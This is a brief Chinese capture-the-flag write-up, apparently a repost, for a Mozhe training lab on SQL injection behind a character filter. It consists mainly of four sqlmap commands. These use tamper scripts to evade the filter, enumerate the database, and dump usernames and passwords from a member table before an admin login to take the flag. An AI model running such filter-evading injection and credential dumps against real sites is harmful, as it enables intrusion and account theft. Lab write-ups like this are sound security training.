SQL过滤字符后手工注入漏洞测试(第1题) - 走看看

zoukankan html css js c++ java

SQL过滤字符后手工注入漏洞测试(第1题)

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登录后台，获取flag，提交即可

查看全文

相关阅读:
ZD ZDC数据类型 sort
常识
 面试
 无锡
 sqlldr return code
025：为什么需要将Logger对象声明为private static final类型的
 中级职称
 《宪法》关于全国人民代表大会的规定
 python打包成exe
请问.AE和PR有什么区别?

原文地址：https://www.cnblogs.com/hack404/p/10755300.html

Copyright © 2011-2022 走看看